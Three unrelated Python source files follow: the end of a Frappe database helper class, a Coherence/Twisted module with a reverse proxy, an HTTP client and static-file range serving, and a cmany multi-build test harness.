raise self.TableMissingError('DocType', doctype)
return columns
def has_column(self, doctype, column):
"""Returns True if column exists in database."""
return column in self.get_table_columns(doctype)
def get_column_type(self, doctype, column):
return self.sql('''SELECT column_type FROM INFORMATION_SCHEMA.COLUMNS
WHERE table_name = 'tab{0}' AND column_name = '{1}' '''.format(doctype, column))[0][0]
def has_index(self, table_name, index_name):
pass
def add_index(self, doctype, fields, index_name=None):
pass
def add_unique(self, doctype, fields, constraint_name=None):
pass
@staticmethod
def get_index_name(fields):
index_name = "_".join(fields) + "_index"
# remove index length if present e.g. (10) from index name
index_name = re.sub(r"\s*\([^)]+\)\s*", r"", index_name)
return index_name
def get_system_setting(self, key):
def _load_system_settings():
return self.get_singles_dict("System Settings")
return frappe.cache().get_value("system_settings", _load_system_settings).get(key)
def close(self):
"""Close database connection."""
if self._conn:
# self._cursor.close()
self._conn.close()
self._cursor = None
self._conn = None
@staticmethod
def escape(s, percent=True):
"""Excape quotes and percent in given string."""
# implemented in specific class
pass
@staticmethod
def is_column_missing(e):
return frappe.db.is_missing_column(e)
def get_descendants(self, doctype, name):
'''Return descendants of the current record'''
node_location_indexes = self.get_value(doctype, name, ('lft', 'rgt'))
if node_location_indexes:
lft, rgt = node_location_indexes
return self.sql_list('''select name from `tab{doctype}`
where lft > {lft} and rgt < {rgt}'''.format(doctype=doctype, lft=lft, rgt=rgt))
else:
# when document does not exist
return []
def is_missing_table_or_column(self, e):
return self.is_missing_column(e) or self.is_missing_table(e)
def multisql(self, sql_dict, values=(), **kwargs):
current_dialect = frappe.db.db_type or 'mariadb'
query = sql_dict.get(current_dialect)
return self.sql(query, values, **kwargs)
def delete(self, doctype, conditions):
if conditions:
conditions, values = self.build_conditions(conditions)
return self.sql("DELETE FROM `tab{doctype}` where {conditions}".format(
doctype=doctype,
conditions=conditions
), values)
else:
frappe.throw(_('No conditions provided'))
def get_last_created(self, doctype):
last_record = self.get_all(doctype, ('creation'), limit=1, order_by='creation desc')
if last_record:
return get_datetime(last_record[0].creation)
else:
return None
def clear_table(self, doctype):
self.sql('truncate `tab{}`'.format(doctype))
def log_touched_tables(self, query, values=None):
if values:
query = frappe.safe_decode(self._cursor.mogrify(query, values))
if query.strip().lower().split()[0] in ('insert', 'delete', 'update', 'alter'):
# single_word_regex is designed to match following patterns
# `tabXxx`, tabXxx and "tabXxx"
# multi_word_regex is designed to match following patterns
# `tabXxx Xxx` and "tabXxx Xxx"
# ([`"]?) Captures " or ` at the begining of the table name (if provided)
# \1 matches the first captured group (quote character) at the end of the table name
# multi word table name must have surrounding quotes.
# (tab([A-Z]\w+)( [A-Z]\w+)*) Captures table names that start with "tab"
# and are continued with multiple words that start with a captital letter
# e.g. 'tabXxx' or 'tabXxx Xxx' or 'tabXxx Xxx Xxx' and so on
single_word_regex = r'([`"]?)(tab([A-Z]\w+))\1'
multi_word_regex = r'([`"])(tab([A-Z]\w+)( [A-Z]\w+)+)\1'
tables = []
for regex in (single_word_regex, multi_word_regex):
tables += [groups[1] for groups in re.findall(regex, query)]
if frappe.flags.touched_tables is None:
frappe.flags.touched_tables = set()
frappe.flags.touched_tables.update(tables)
def bulk_insert(self, doctype, fields, values, ignore_duplicates=False):
"""
Insert multiple records at a time
:param doctype: Doctype name
:param fields: list of fields
:params values: list of list of values
"""
insert_list = []
fields = ", ".join(["`"+field+"`" for field in fields])
for idx, value in enumerate(values):
insert_list.append(tuple(value))
if idx and (idx%10000 == 0 or idx < len(values)-1):
self.sql("""INSERT {ignore_duplicates} INTO `tab{doctype}` ({fields}) VALUES {values}""".format(
ignore_duplicates="IGNORE" if ignore_duplicates else "",
doctype=doctype,
fields=fields,
values=", ".join(['%s'] * len(insert_list))
), tuple(insert_list))
insert_list = []
def enqueue_jobs_after_commit():
if frappe.flags.enqueue_after_commit and len(frappe.flags.enqueue_after_commit) > 0:
for job in frappe.flags.enqueue_after_commit:
q = get_queue(job.get("queue"), is_async=job.get("is_async"))
q.enqueue_call(execute_job, timeout=job.get("timeout"),
kwargs=job.get("queue_args"))
frappe.flags.enqueue_after_commit = []
# Helpers
def _cast_result(doctype, result):
batch = [ ]
try:
for field, value in result:
df = frappe.get_meta(doctype).get_field(field)
if df:
value = cast_fieldtype(df.fieldtype, value)
batch.append(tuple([field, value]))
except frappe.exceptions.DoesNotExistError:
return result
return tuple(batch)
|
|
# Licensed under the MIT license
# http://opensource.org/licenses/mit-license.php
# Copyright (C) 2006 Fluendo, S.A. (www.fluendo.com).
# Copyright 2006, Frank Scholz <coherence@beebits.net>
import urlparse
from urlparse import urlsplit
from coherence.extern.et import parse_xml as et_parse_xml
from coherence import SERVER_ID
from twisted.web import server, http, static
from twisted.web import client, error
from twisted.web import proxy, resource, server
from twisted.internet import reactor,protocol,defer,abstract
from twisted.python import failure
from twisted.python.util import InsensitiveDict
try:
from twisted.protocols._c_urlarg import unquote
except ImportError:
from urllib import unquote
try:
import netifaces
have_netifaces = True
except ImportError:
have_netifaces = False
def means_true(value):
if isinstance(value,basestring):
value = value.lower()
return value in [True,1,'1','true','yes','ok']
def generalise_boolean(value):
""" standardize the different boolean incarnations
transform anything that looks like a "True" into a '1',
and everything else into a '0'
"""
if means_true(value):
return '1'
return '0'
generalize_boolean = generalise_boolean
def parse_xml(data, encoding="utf-8"):
return et_parse_xml(data,encoding)
def parse_http_response(data):
""" don't try to get the body, there are reponses without """
header = data.split('\r\n\r\n')[0]
lines = header.split('\r\n')
cmd = lines[0].split(' ')
lines = map(lambda x: x.replace(': ', ':', 1), lines[1:])
lines = filter(lambda x: len(x) > 0, lines)
headers = [x.split(':', 1) for x in lines]
headers = dict(map(lambda x: (x[0].lower(), x[1]), headers))
return cmd, headers
def get_ip_address(ifname):
"""
determine the IP address by interface name
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/439094
(c) Paul Cannon
Uses the Linux SIOCGIFADDR ioctl to find the IP address associated
with a network interface, given the name of that interface, e.g. "eth0".
The address is returned as a string containing a dotted quad.
Updated to work on BSD. OpenBSD and OSX share the same value for
SIOCGIFADDR, and its likely that other BSDs do too.
Updated to work on Windows,
using the optional Python module netifaces
http://alastairs-place.net/netifaces/
Thx Lawrence for that patch!
"""
if have_netifaces:
if ifname in netifaces.interfaces():
iface = netifaces.ifaddresses(ifname)
ifaceadr = iface[netifaces.AF_INET]
# we now have a list of address dictionaries, there may be multiple addresses bound
return ifaceadr[0]['addr']
import sys
if sys.platform in ('win32','sunos5'):
return '127.0.0.1'
from os import uname
import socket
import fcntl
import struct
system_type = uname()[0]
if system_type == "Linux":
SIOCGIFADDR = 0x8915
else:
SIOCGIFADDR = 0xc0206921
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
SIOCGIFADDR,
struct.pack('256s', ifname[:15])
)[20:24])
except:
return '127.0.0.1'
def get_host_address():
""" try to get determine the interface used for
the default route, as this is most likely
the interface we should bind to (on a single homed host!)
"""
import sys
if sys.platform == 'win32':
if have_netifaces:
interfaces = netifaces.interfaces()
if len(interfaces):
return get_ip_address(interfaces[0]) # on windows assume first interface is primary
else:
try:
route_file = '/proc/net/route'
route = open(route_file)
if(route):
tmp = route.readline() #skip first line
while (tmp != ''):
tmp = route.readline()
l = tmp.split('\t')
if (len(l) > 2):
if l[1] == '00000000': #default route...
route.close()
return get_ip_address(l[0])
except IOError, msg:
""" fallback to parsing the output of netstat """
from twisted.internet import utils
def result(r):
from os import uname
(osname,_, _, _,_) = uname()
osname = osname.lower()
lines = r.split('\n')
for l in lines:
l = l.strip(' \r\n')
parts = [x.strip() for x in l.split(' ') if len(x) > 0]
if parts[0] in ('0.0.0.0','default'):
if osname[:6] == 'darwin':
return get_ip_address(parts[5])
else:
return get_ip_address(parts[-1])
return '127.0.0.1'
def fail(f):
return '127.0.0.1'
d = utils.getProcessOutput('netstat', ['-rn'])
d.addCallback(result)
d.addErrback(fail)
return d
except Exception, msg:
import traceback
traceback.print_exc()
""" return localhost if we haven't found anything """
return '127.0.0.1'
def de_chunk_payload(response):
try:
import cStringIO as StringIO
except ImportError:
import StringIO
""" This method takes a chunked HTTP data object and unchunks it."""
newresponse = StringIO.StringIO()
# chunked encoding consists of a bunch of lines with
# a length in hex followed by a data chunk and a CRLF pair.
response = StringIO.StringIO(response)
def read_chunk_length():
line = response.readline()
try:
len = int(line.strip(),16)
except ValueError:
len = 0
return len
len = read_chunk_length()
while (len > 0):
newresponse.write(response.read(len))
line = response.readline() # after chunk and before next chunk length
len = read_chunk_length()
return newresponse.getvalue()
class Request(server.Request):
def process(self):
"Process a request."
# get site from channel
self.site = self.channel.site
# set various default headers
self.setHeader('server', SERVER_ID)
self.setHeader('date', http.datetimeToString())
self.setHeader('content-type', "text/html")
# Resource Identification
self.prepath = []
self.postpath = map(unquote, self.path[1:].split('/'))
try:
def deferred_rendering(r):
self.render(r)
resrc = self.site.getResourceFor(self)
if isinstance(resrc, defer.Deferred):
resrc.addCallback(deferred_rendering)
resrc.addErrback(self.processingFailed)
else:
self.render(resrc)
except:
self.processingFailed(failure.Failure())
class Site(server.Site):
noisy = False
requestFactory = Request
def startFactory(self):
pass
#http._logDateTimeStart()
class ProxyClient(http.HTTPClient):
"""Used by ProxyClientFactory to implement a simple web proxy."""
def __init__(self, command, rest, version, headers, data, father):
self.father = father
self.command = command
self.rest = rest
if headers.has_key("proxy-connection"):
del headers["proxy-connection"]
#headers["connection"] = "close"
self.headers = headers
#print "command", command
#print "rest", rest
#print "headers", headers
self.data = data
self.send_data = 0
def connectionMade(self):
self.sendCommand(self.command, self.rest)
for header, value in self.headers.items():
self.sendHeader(header, value)
self.endHeaders()
self.transport.write(self.data)
def handleStatus(self, version, code, message):
if message:
# Add a whitespace to message, this allows empty messages
# transparently
message = " %s" % (message,)
if version == 'ICY':
version = 'HTTP/1.1'
#print "ProxyClient handleStatus", version, code, message
self.father.transport.write("%s %s %s\r\n" % (version, code, message))
def handleHeader(self, key, value):
#print "ProxyClient handleHeader", key, value
if not key.startswith('icy-'):
#print "ProxyClient handleHeader", key, value
self.father.transport.write("%s: %s\r\n" % (key, value))
def handleEndHeaders(self):
#self.father.transport.write("%s: %s\r\n" % ( 'Keep-Alive', ''))
#self.father.transport.write("%s: %s\r\n" % ( 'Accept-Ranges', 'bytes'))
#self.father.transport.write("%s: %s\r\n" % ( 'Content-Length', '2000000'))
#self.father.transport.write("%s: %s\r\n" % ( 'Date', 'Mon, 26 Nov 2007 11:04:12 GMT'))
#self.father.transport.write("%s: %s\r\n" % ( 'Last-Modified', 'Sun, 25 Nov 2007 23:19:51 GMT'))
##self.father.transport.write("%s: %s\r\n" % ( 'Server', 'Apache/2.0.52 (Red Hat)'))
self.father.transport.write("\r\n")
def handleResponsePart(self, buffer):
#print "ProxyClient handleResponsePart", len(buffer), self.father.chunked
self.send_data += len(buffer)
self.father.write(buffer)
def handleResponseEnd(self):
#print "handleResponseEnd", self.send_data
self.transport.loseConnection()
self.father.channel.transport.loseConnection()
class ProxyClientFactory(protocol.ClientFactory):
"""
Used by ProxyRequest to implement a simple web proxy.
"""
protocol = proxy.ProxyClient
def __init__(self, command, rest, version, headers, data, father):
self.father = father
self.command = command
self.rest = rest
self.headers = headers
self.data = data
self.version = version
def buildProtocol(self, addr):
return self.protocol(self.command, self.rest, self.version,
self.headers, self.data, self.father)
def clientConnectionFailed(self, connector, reason):
self.father.transport.write("HTTP/1.0 501 Gateway error\r\n")
self.father.transport.write("Content-Type: text/html\r\n")
self.father.transport.write("\r\n")
self.father.transport.write('''<H1>Could not connect</H1>''')
self.father.transport.loseConnection()
class ReverseProxyResource(proxy.ReverseProxyResource):
"""
Resource that renders the results gotten from another server
Put this resource in the tree to cause everything below it to be relayed
to a different server.
@ivar proxyClientFactoryClass: a proxy client factory class, used to create
new connections.
@type proxyClientFactoryClass: L{ClientFactory}
@ivar reactor: the reactor used to create connections.
@type reactor: object providing L{twisted.internet.interfaces.IReactorTCP}
"""
proxyClientFactoryClass = ProxyClientFactory
def __init__(self, host, port, path, reactor=reactor):
"""
@param host: the host of the web server to proxy.
@type host: C{str}
@param port: the port of the web server to proxy.
@type port: C{port}
@param path: the base path to fetch data from. Note that you shouldn't
put any trailing slashes in it, it will be added automatically in
request. For example, if you put B{/foo}, a request on B{/bar} will
be proxied to B{/foo/bar}.
@type path: C{str}
"""
resource.Resource.__init__(self)
self.host = host
self.port = port
self.path = path
self.qs = ''
self.reactor = reactor
def getChild(self, path, request):
return ReverseProxyResource(
self.host, self.port, self.path + '/' + path)
def render(self, request):
"""
Render a request by forwarding it to the proxied server.
"""
# RFC 2616 tells us that we can omit the port if it's the default port,
# but we have to provide it otherwise
if self.port == 80:
request.received_headers['host'] = self.host
else:
request.received_headers['host'] = "%s:%d" % (self.host, self.port)
request.content.seek(0, 0)
qs = urlparse.urlparse(request.uri)[4]
if qs == '':
qs = self.qs
if qs:
rest = self.path + '?' + qs
else:
rest = self.path
clientFactory = self.proxyClientFactoryClass(
request.method, rest, request.clientproto,
request.getAllHeaders(), request.content.read(), request)
self.reactor.connectTCP(self.host, self.port, clientFactory)
return server.NOT_DONE_YET
def resetTarget(self,host,port,path,qs=''):
self.host = host
self.port = port
self.path = path
self.qs = qs
class ReverseProxyUriResource(ReverseProxyResource):
uri = None
def __init__(self, uri, reactor=reactor):
self.uri = uri
_,host_port,path,params,_ = urlsplit(uri)
if host_port.find(':') != -1:
host,port = tuple(host_port.split(':'))
port = int(port)
else:
host = host_port
port = 80
if path =='':
path = '/'
if params == '':
rest = path
else:
rest = '?'.join((path, params))
ReverseProxyResource.__init__(self, host, port, rest, reactor)
def resetUri (self, uri):
self.uri = uri
_,host_port,path,params,_ = urlsplit(uri)
if host_port.find(':') != -1:
host,port = tuple(host_port.split(':'))
port = int(port)
else:
host = host_port
port = 80
self.resetTarget(host, port, path, params)
class myHTTPPageGetter(client.HTTPPageGetter):
followRedirect = True
def connectionMade(self):
method = getattr(self, 'method', 'GET')
#print "myHTTPPageGetter", method, self.factory.path
self.sendCommand(method, self.factory.path)
self.sendHeader('Host', self.factory.headers.get("host", self.factory.host))
self.sendHeader('User-Agent', self.factory.agent)
if self.factory.cookies:
l=[]
for cookie, cookval in self.factory.cookies.items():
l.append('%s=%s' % (cookie, cookval))
self.sendHeader('Cookie', '; '.join(l))
data = getattr(self.factory, 'postdata', None)
if data is not None:
self.sendHeader("Content-Length", str(len(data)))
for (key, value) in self.factory.headers.items():
if key.lower() != "content-length":
# we calculated it on our own
self.sendHeader(key, value)
self.endHeaders()
self.headers = {}
if data is not None:
self.transport.write(data)
def handleResponse(self, response):
if self.quietLoss:
return
if self.failed:
self.factory.noPage(
failure.Failure(
error.Error(
self.status, self.message, response)))
elif self.factory.method != 'HEAD' and self.length != None and self.length != 0:
self.factory.noPage(failure.Failure(
client.PartialDownloadError(self.status, self.message, response)))
else:
if(self.headers.has_key('transfer-encoding') and
self.headers['transfer-encoding'][0].lower() == 'chunked'):
self.factory.page(de_chunk_payload(response))
else:
self.factory.page(response)
# server might be stupid and not close connection. admittedly
# the fact we do only one request per connection is also
# stupid...
self.quietLoss = 1
self.transport.loseConnection()
class HeaderAwareHTTPClientFactory(client.HTTPClientFactory):
protocol = myHTTPPageGetter
noisy = False
def __init__(self, url, method='GET', postdata=None, headers=None,
agent="Twisted PageGetter", timeout=0, cookies=None,
followRedirect=True, redirectLimit=20):
self.followRedirect = followRedirect
self.redirectLimit = redirectLimit
self._redirectCount = 0
self.timeout = timeout
self.agent = agent
if cookies is None:
cookies = {}
self.cookies = cookies
if headers is not None:
self.headers = InsensitiveDict(headers)
else:
self.headers = InsensitiveDict()
if postdata is not None:
self.headers.setdefault('Content-Length', len(postdata))
# just in case a broken http/1.1 decides to keep connection alive
self.headers.setdefault("connection", "close")
self.postdata = postdata
self.method = method
self.setURL(url)
self.waiting = 1
self.deferred = defer.Deferred()
self.response_headers = None
def buildProtocol(self, addr):
p = protocol.ClientFactory.buildProtocol(self, addr)
p.method = self.method
p.followRedirect = self.followRedirect
if self.timeout:
timeoutCall = reactor.callLater(self.timeout, p.timeout)
self.deferred.addBoth(self._cancelTimeout, timeoutCall)
return p
def page(self, page):
if self.waiting:
self.waiting = 0
self.deferred.callback((page, self.response_headers))
class HeaderAwareHTTPDownloader(client.HTTPDownloader):
def gotHeaders(self, headers):
self.value = headers
if self.requestedPartial:
contentRange = headers.get("content-range", None)
if not contentRange:
# server doesn't support partial requests, oh well
self.requestedPartial = 0
return
start, end, realLength = http.parseContentRange(contentRange[0])
if start != self.requestedPartial:
# server is acting wierdly
self.requestedPartial = 0
def getPage(url, contextFactory=None, *args, **kwargs):
"""Download a web page as a string.
Download a page. Return a deferred, which will callback with a
page (as a string) or errback with a description of the error.
See HTTPClientFactory to see what extra args can be passed.
"""
scheme, host, port, path = client._parse(url)
factory = HeaderAwareHTTPClientFactory(url, *args, **kwargs)
if scheme == 'https':
from twisted.internet import ssl
if contextFactory is None:
contextFactory = ssl.ClientContextFactory()
reactor.connectSSL(host, port, factory, contextFactory)
else:
reactor.connectTCP(host, port, factory)
return factory.deferred
def downloadPage(url, file, contextFactory=None, *args, **kwargs):
"""Download a web page to a file.
@param file: path to file on filesystem, or file-like object.
See HTTPDownloader to see what extra args can be passed.
"""
scheme, host, port, path = client._parse(url)
factory = HeaderAwareHTTPDownloader(url, file, *args, **kwargs)
factory.noisy = False
if scheme == 'https':
from twisted.internet import ssl
if contextFactory is None:
contextFactory = ssl.ClientContextFactory()
reactor.connectSSL(host, port, factory, contextFactory)
else:
reactor.connectTCP(host, port, factory)
return factory.deferred
class StaticFile(static.File):
""" taken from twisted.web.static and modified
accordingly to the patch by John-Mark Gurney
http://resnet.uoregon.edu/~gurney_j/jmpc/dist/twisted.web.static.patch
"""
def render(self, request):
#print ""
#print "StaticFile", request
#print "StaticFile in", request.received_headers
"""You know what you doing."""
self.restat()
if self.type is None:
self.type, self.encoding = static.getTypeAndEncoding(self.basename(),
self.contentTypes,
self.contentEncodings,
self.defaultType)
if not self.exists():
return self.childNotFound.render(request)
if self.isdir():
return self.redirect(request)
#for content-length
fsize = size = self.getFileSize()
request.setHeader('accept-ranges','bytes')
if self.type:
request.setHeader('content-type', self.type)
if self.encoding:
request.setHeader('content-encoding', self.encoding)
try:
f = self.openForReading()
except IOError, e:
import errno
if e[0] == errno.EACCES:
return error.ForbiddenResource().render(request)
else:
raise
if request.setLastModified(self.getmtime()) is http.CACHED:
return ''
trans = True
range = request.getHeader('range')
#print "StaticFile", range
tsize = size
if range is not None:
# This is a request for partial data...
bytesrange = range.split('=')
assert bytesrange[0] == 'bytes',\
"Syntactically invalid http range header!"
start, end = bytesrange[1].split('-', 1)
if start:
f.seek(int(start))
if end:
end = int(end)
else:
end = size - 1
else:
lastbytes = int(end)
if size < lastbytes:
lastbytes = size
start = size - lastbytes
f.seek(start)
fsize = lastbytes
end = size - 1
size = end + 1
fsize = end - int(start) + 1
# start is the byte offset to begin, and end is the byte offset
# to end.. fsize is size to send, tsize is the real size of
# the file, and size is the byte position to stop sending.
if fsize <= 0:
request.setResponseCode(http.REQUESTED_RANGE_NOT_SATISFIABLE)
fsize = tsize
trans = False
else:
request.setResponseCode(http.PARTIAL_CONTENT)
request.setHeader('content-range',"bytes %s-%s/%s " % (
str(start), str(end), str(tsize)))
#print "StaticFile", start, end, tsize
request.setHeader('content-length', str(fsize))
if request.method == 'HEAD' or trans == False:
# pretend we're a HEAD request, so content-length
# won't be overwritten.
#print "HEAD request"
request.method = 'HEAD'
return ''
#print "StaticFile out", request.headers, request.code
# return data
# size is the byte position to stop sending, not how many bytes to send
static.FileTransfer(f, size, request)
# and make sure the connection doesn't get closed
return server.NOT_DONE_YET
class BufferFile(static.File):
""" taken from twisted.web.static and modified
accordingly to the patch by John-Mark Gurney
http://resnet.uoregon.edu/~gurney_j/jmpc/dist/twisted.web.static.patch
"""
def __init__(self, path, target_size=0, *args):
static.File.__init__(self, path, *args)
self.target_size = target_size
self.upnp_retry = None
def render(self, request):
#print ""
#print "BufferFile", request
# FIXME detect when request is REALLY finished
if request is None or request.finished :
print "No request to render!"
return ''
"""You know what you doing."""
self.restat()
if self.type is None:
self.type, self.encoding = static.getTypeAndEncoding(self.basename(),
self.contentTypes,
self.contentEncodings,
self.defaultType)
if not self.exists():
return self.childNotFound.render(request)
if self.isdir():
return self.redirect(request)
#for content-length
if (self.target_size > 0):
fsize = size = int(self.target_size)
else:
fsize = size = int(self.getFileSize())
#print fsize
if size == int(self.getFileSize()):
request.setHeader('accept-ranges','bytes')
if self.type:
request.setHeader('content-type', self.type)
if self.encoding:
request.setHeader('content-encoding', self.encoding)
try:
f = self.openForReading()
except IOError, e:
import errno
if e[0] == errno.EACCES:
return error.ForbiddenResource().render(request)
else:
raise
if request.setLastModified(self.getmtime()) is http.CACHED:
return ''
trans = True
range = request.getHeader('range')
#print "StaticFile", range
tsize = size
if range is not None:
# This is a request for partial data...
bytesrange = range.split('=')
assert bytesrange[0] == 'bytes',\
"Syntactically invalid http range header!"
start, end = bytesrange[1].split('-', 1)
if start:
start = int(start)
# Are we requesting something beyond the current size of the file?
if (start >= self.getFileSize()):
# Retry later!
print bytesrange
print "Requesting data beyond current scope -> postpone rendering!"
self.upnp_retry = reactor.callLater(1.0, self.render, request)
return server.NOT_DONE_YET
f.seek(start)
if end:
#print ":%s" % end
end = int(end)
else:
end = size - 1
else:
lastbytes = int(end)
if size < lastbytes:
lastbytes = size
start = size - lastbytes
f.seek(start)
fsize = lastbytes
end = size - 1
size = end + 1
fsize = end - int(start) + 1
# start is the byte offset to begin, and end is the byte offset
# to end.. fsize is size to send, tsize is the real size of
# the file, and size is the byte position to stop sending.
if fsize <= 0:
request.setResponseCode(http.REQUESTED_RANGE_NOT_SATISFIABLE)
fsize = tsize
trans = False
else:
request.setResponseCode(http.PARTIAL_CONTENT)
request.setHeader('content-range',"bytes %s-%s/%s " % (
str(start), str(end), str(tsize)))
#print "StaticFile", start, end, tsize
request.setHeader('content-length', str(fsize))
if request.method == 'HEAD' or trans == False:
# pretend we're a HEAD request, so content-length
# won't be overwritten.
request.method = 'HEAD'
return ''
#print "StaticFile out", request.headers, request.code
# return data
# size is the byte position to stop sending, not how many bytes to send
BufferFileTransfer(f, size - f.tell(), request)
# and make sure the connection doesn't get closed
return server.NOT_DONE_YET
class BufferFileTransfer(object):
"""
A class to represent the transfer of a file over the network.
"""
request = None
def __init__(self, file, size, request):
self.file = file
self.size = size
self.request = request
self.written = self.file.tell()
request.registerProducer(self, 0)
def resumeProducing(self):
#print "resumeProducing", self.request,self.size,self.written
if not self.request:
return
data = self.file.read(min(abstract.FileDescriptor.bufferSize, self.size - self.written))
if data:
self.written += len(data)
# this .write will spin the reactor, calling .doWrite and then
# .resumeProducing again, so be prepared for a re-entrant call
self.request.write(data)
if self.request and self.file.tell() == self.size:
self.request.unregisterProducer()
self.request.finish()
self.request = None
def pauseProducing(self):
pass
def stopProducing(self):
#print "stopProducing",self.request
self.request.unregisterProducer()
self.file.close()
self.request.finish()
self.request = None
from datetime import datetime, tzinfo, timedelta
import random
class CET(tzinfo):
def __init__(self):
self.__offset = timedelta(minutes=60)
self.__name = 'CET'
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self,dt):
return timedelta(0)
class CEST(tzinfo):
def __init__(self):
self.__offset = timedelta(minutes=120)
self.__name = 'CEST'
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self,dt):
return timedelta(0)
bdates = [ datetime(1997,2,28,17,20,tzinfo=CET()), # Sebastian Oliver
datetime(1999,9,19,4,12,tzinfo=CEST()), # Patrick Niklas
datetime(2000,9,23,4,8,tzinfo=CEST()), # Saskia Alexa
datetime(2003,7,23,1,18,tzinfo=CEST()), # Mara Sophie
# you are the best!
]
def datefaker():
return random.choice(bdates)
|
|
#!/usr/bin/env python3
import unittest as ut
import subtest_fix
import os
import sys
import glob
import argparse
import copy
import tempfile
from itertools import combinations
import c4.cmany as cmany
import c4.cmany.util as util
import c4.cmany.main as main
import c4.cmany.cmake as cmake
from multiprocessing import cpu_count as cpu_count
srcdir = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'src')
sys.path.insert(0, srcdir)
maincmd = [sys.executable, '-m', 'c4.cmany.main', '--show-args']
projdir = os.path.dirname(__file__)
compiler_set = os.environ.get('CMANY_TEST_COMPILERS', None)
build_types = os.environ.get('CMANY_TEST_BUILDTYPES', 'Debug,Release')
test_projs = os.environ.get('CMANY_TEST_PROJS', 'hello,libhello')
proj_targets = {
'hello': {
'lib': [],
'exe': ['hello'],
},
'libhello': {
'lib': ['hello', 'hello_static'],
'exe': ['test_hello', 'test_hello_static'],
},
}
flag_bundle_set = {
'none': {
'spec': 'none',
'expected': {
'none': {'vars': [], 'defines': [], 'cxxflags': [], 'flags': [], },
},
},
'foo': {
'spec': '\'foo: -V FOO_VAR=1 -D FOO_DEF=1 -X "wall" -C "wall"\'',
'expected': {
'foo': {'vars': ['FOO_VAR=1'], 'defines': ['FOO_DEF=1'], 'cxxflags': ['wall'], 'flags': ['wall'], },
},
},
'bar': {
'spec': '\'bar: -V BAR_VAR=1 -D BAR_DEF=1 -X "g3" -C "g3"\'',
'expected': {
'bar': {'vars': ['BAR_VAR=1'], 'defines': ['BAR_DEF=1'], 'cxxflags': ['g3'], 'flags': ['g3'], },
},
},
}
variant_set = [flag_bundle_set[v]['spec'] for v in ('none', 'foo', 'bar')]
variant_tests = {
'variant_test00-null':[],
'variant_test01-none_explicit':['none'],
'variant_test10-foo_only':['foo'],
'variant_test11-none_foo':['none', 'foo'],
'variant_test20-bar_only':['bar'],
'variant_test21-none_bar':['none', 'bar'],
'variant_test30-foobar_only':['foo', 'bar'],
'variant_test31-foobar_only':['none', 'foo', 'bar'],
}
def _get_variant_spec(test_name):
blueprint = variant_tests[test_name]
if not blueprint:
return []
li = ['-v'] + [','.join(flag_bundle_set[v]['spec']) for v in blueprint]
variants = cmany.Variant.create_variants(li)
return li, variants
# unset environment variables which affect the behaviour of child invokations
# of cmany
os.environ['CMANY_ARGS'] = ''
os.environ['CMANY_PFX_ARGS'] = ''
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
class CMakeTestProj:
def __init__(self, proj):
self.proj = proj
self.root = util.chkf(projdir, proj)
if proj_targets.get(proj) is None:
raise Exception("no target info for project " + proj)
self.libs = proj_targets[proj]['lib']
self.exes = proj_targets[proj]['exe']
self.targets = self.libs + self.exes
self.multi_target = (len(self.targets) > 1)
# http://stackoverflow.com/questions/17176887/python-get-all-permutation-of-a-list-w-o-repetitions
self.target_combinations = []
for i in range(1, len(self.targets) + 1):
self.target_combinations += list(combinations(self.targets, i))
def run(self, args_, custom_root=None):
args = copy.deepcopy(args_)
root = self.root
if custom_root is not None:
with util.setcwd(self.root):
root = os.path.abspath(custom_root)
if not os.path.exists(root):
os.makedirs(root)
projdir = os.path.abspath('.')
args.append(projdir)
args = maincmd + args
with util.setcwd(root):
tmpfile, tmpname = tempfile.mkstemp(prefix="_cmany_tmp.out.")
with util.stdout_redirected(tmpfile):
#print("----->run():", self.proj, "at", os.getcwd(), " ".join(args))
util.runsyscmd(args)
#print("----->finished run():", self.proj, "at", os.getcwd(), " ".join(args))
# close the mkstemp handle
outsock = os.fdopen(tmpfile, "r")
outsock.close()
# read the input
with open(tmpname, "r") as fh:
output = fh.read()
# remove the tmpfile
os.remove(tmpname)
#print("\n"*2, self.root, args[4:], "output len=", len(output), output[:min(len(output), 256)]+".................\n\n")
return output
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# prepare inputs
test_projs = util.splitesc(test_projs, ',')
projs = [CMakeTestProj(p) for p in test_projs]
if compiler_set is None:
compiler_set = [cmany.Compiler.default()]
else:
compiler_set = [cmany.Compiler(c) for c in util.splitesc(compiler_set, ',')]
build_types = [cmany.BuildType(b) for b in util.splitesc(build_types, ',')]
variant_set = cmany.Variant.create_variants(variant_set)
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def run_projs(testobj, args, check_fn=None):
numbuilds = len(compiler_set) * len(build_types) * len(variant_set)
#
# run with default parameters
bd = '.test/0--default--build'
id = '.test/0--default--install'
for p in projs:
with testobj.subTest(msg="default parameters", proj=p.proj):
p.run(args + ['--build-dir', bd, '--install-dir', id])
if check_fn:
tb = TestBuild(proj=p, buildroot=bd, installroot=id,
compiler=cmany.Compiler.default(),
build_type=cmany.BuildType.default(),
variant=cmany.Variant.default(),
numbuilds=1)
check_fn(tb)
#
# run with default parameters in a non root dir
rd = '.test/1--non_root_dir'
for p in projs:
with testobj.subTest(msg="run in a non root dir", proj=p.proj):
p.run(args, custom_root=rd)
if check_fn:
tb = TestBuild(proj=p, buildroot=bd, installroot=id,
compiler=cmany.Compiler.default(),
build_type=cmany.BuildType.default(),
variant=cmany.Variant.default(),
numbuilds=1)
check_fn(tb)
#
if numbuilds == 1:
return
#
# run all sys,arch,compiler,buildtype,variant combinations at once
bd = '.test/2.1--comps{}--types{}--variants{}--build'.format(len(compiler_set), len(build_types), len(variant_set))
id = '.test/2.1--comps{}--types{}--variants{}--install'.format(len(compiler_set), len(build_types), len(variant_set))
for p in projs:
with testobj.subTest(msg="run all combinations at once", proj=p.proj):
p.run(args + ['--build-dir', bd,
'--install-dir', id,
'-c', ','.join([c.name if c.is_msvc else c.path for c in compiler_set]),
'-t', ','.join([str(b) for b in build_types]),
'-v', ','.join([v.full_specs for v in variant_set])
])
if check_fn:
for c in compiler_set:
for t in build_types:
for v in variant_set:
